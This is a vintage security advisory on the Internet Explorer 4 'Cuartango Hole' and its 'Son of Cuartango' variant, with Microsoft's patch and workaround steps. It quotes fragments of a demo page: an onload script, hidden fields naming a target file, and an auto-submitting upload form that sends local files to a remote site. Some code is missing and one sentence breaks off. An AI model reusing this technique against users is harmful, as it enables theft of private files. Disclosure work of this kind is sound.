

    Win 9x, NT with IE 4.01 (w/ and w/o SP1) and 5PR


    Juan  Carlos  G.  Cuartango  of  Spain has discovered an extremely
    serious security hole in Internet Explorer 4.  With a small amount
    of JavaScript code on  a Web page, a  Web site operator can  steal
    any file from  a user's hard  disk and automatically  uploaded the
    contents to a Web  server.  More worrisome  is that fact that  the
    security hole can be also exploited in an HTML-based Email message
    in  Outlook  Express.   Simply  by  reading  a booby-trapped Email
    message, private files can be  stolen from one's hard disk.   Most
    computer users will consider this unacceptable product defect.

    Details of the security hole were posted at Mr. Cuartango site:

    The Web site also  contains a demo of  the security problem.   The
    demo is  based on  a standard  file uploader  HTML form.  Normally
    only the user can  manullay set the name  of the file to  uploaded
    but IE4 inadvertently allows  JavaScript to execute cut  and paste
    functions to  set the  file name.   After the  file name  is  set,
    JavaScript auto-submits the form to upload the file.

    Following was taken from site above.  There is an input form field
    used to  tranfer files  from the  browsing computer  to a WEB site
    this input field is HTML coded as:

        <input type="file" name="filename" size="30">

    Theoretically this input field can  be filled only by the  user by
    clicking a "Browse" button or typing  the file name.  In order  to
    avoid a security hole, script files are not allowed to modify  the
    value of this input field, the sentence bellow will not work (very
    clever MS Explorer programmers):

        document.forms[0].filename = "C:\config.sys";

    What  Microsoft  programmers  forgot  is  that  "copy" and "paste"
    commands are possible  in scripting with  Internet Explorer 4  and
    they did not protect the file input field against this  operation.
    The attack is the evident:

    1- Create a second form with a hidden field named "T1"  containing
       the file name you want to hack.
    2- In the HTML Body Onload event fire an script:

        <body onload="getfile()">

        function getfile()

    The result is that  the file is POSTED  to the malicious WEB  site
    defined in the form action  property.  There is a  second security
    issue:  The content of your  clipboard can be sent to a  malicious
    WEB just performing a "paste" command over an input text box.  The
    source code of demo page looks like this:


    <script language="JavaScript">

    function getfile()


    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <meta name="GENERATOR" content="Microsoft FrontPage 3.0">
    <title>Cuartango Hole 2</title>

    <body onload="getfile()">

    <form enctype="multipart/form-data" method="post" action="">

      <input type="hidden" name="storage" value="ab"><input type="hidden" name="hpd"
      value="cuartangojc"><input type="hidden" name="password" value="asisea"><p><strong>I am
      transfering your file</strong> <input type="file" name="filename" size="30"> <strong>to my
      web site </strong>  </p>


    <form method="POST">
      <input type="hidden" name="T1" value="/test.txt"><p> </p>

    <p align="center">Transfer # <img src="/cgi-bin/Count.cgi" width="97" height="24"></p>


    The bug is reported to be  present in the preview version of  IE5,
    and IE  4.x (but  not first  release).   There is  also a  program
    called  TegoSoft  WebExpress  who  does  the  same  thing by using
    ActiveX and runs the file.

    After  a  while,  same  person  found  similar  bug  that  avoided
    protection by initial MS fix.  This vulnerability has been  called
    The Son of Cuartango Hole.  This is a problem closely related with
    the  Cuartango  Hole  issue.  Microsoft  called  it the "Untrusted
    Scripted Paste (USP)" and  published a FIX that  unfortunately did
    not fix completely the problem.  There is an input form field used
    to tranfer  files from  the browsing  computer to  a WEB site this
    input field is HTML coded as:

        <input type="file" name="filename" size="30">

    Theoretically this input field can  be filled only by the  user by
    clicking a "Browse" button or typing  the file name.  In order  to
    avoid a security hole, script files are not allowed to modify  the
    value of this input field, the sentence bellow will not work:

        document.forms[0].filename = "C:\config.sys";

    The  Cuartango  Hole  revealed  that  a  single scripted "copy and
    paste"  operation  could  write  a  file  name on the input field,
    Microsoft's  old  USP  patch  fixed  this  single "copy and paste"
    vulnerability.  There is a workaround making the "paste" operation
    work again.   The idea  is: create  a "textrange"  object with the
    selection of the file input  and then paste over this  "textrange"
    object.   The  code  below  is  a  bit more sophisticated than the
    "Cuartango Hole" code:   T1 is a hidden  input field defined in  a
    second  form  containing  the  file pathname to  be copied to  the

        <body onload="getfile()">

        function getfile()
        var rng = document.selection.createRange();

    The result is that  the file is POSTED  to the malicious WEB  site
    defined in  the form  action property.   A similar  code will also
    work inside an HTML formatted e-mail.  Your computer files can  be
    sent to  a WEB  site by  a malicious  Script (if  the file name is
    known).  The malicious script can  be executed from a WEB page  or
    from an HTML received e-mail.


    On  November  18th  Microsoft  released  an updated version of the
    patch  for   the  "Untrusted  Scripted  Paste" vulnerability.  The
    updated  patch  fixes  the  original  vulnerability  as  well as a
    newly-discovered variant.

    Windows 98
     Windows 98 customers can  obtain the updated patch  using Windows
     Update.   To  obtain  this  patch  using  Windows  Update, launch
     Windows Update  from the  Windows Start  Menu and  click "Product
     Updates."  When prompted,   select 'Yes' to allow Windows  Update
     to determine whether this patch  and other updates are needed  by
     your computer. If your computer  does  need this patch,  you will
     find it listed under the "Critical Updates"  section of the page.

    Internet Explorer 4.01
     Customers using Internet Explorer 4.01 can obtain the patch from
     the Internet Explorer Security web site:

    Administrative Workaround
     If the user  has disabled the  default warning that  is displayed
     when submitting unencrypted  forms, re-enabling this  feature can
     provide  additional  protection.  The  warning  prompt makes sure
     users are  alerted   if a  script attempts  to submit  data using
     forms.  Users  should be cautious  if they see  this warning when
     browsing and have not  actually  chosen to  submit any data.   To
     turn on this prompt:

        1. From Internet Explorer, choose "Internet Options" from  the
           "View" menu.
        2. Click on the tab labeled "Security".
        3. Click on "Internet Zone", then click "Customize Settings".
        4. Scroll  to "Submit  non-encrypted form  data" and  click on

    The same procedure should  be followed for the  "Restricted Sites"
    Zone.  Additionally, users who cannot apply the patch  immediately
    can disable Active Scripting technologies in Internet Explorer  to
    protect  themselves  from this issue.  Please note that  the Zones
    security feature   in Internet Explorer  4 can be  used to disable
    Active Scripting  (VBScript  and JScript) in untrusted  or unknown
    Internet sites, while   still permitting it  in trusted and  known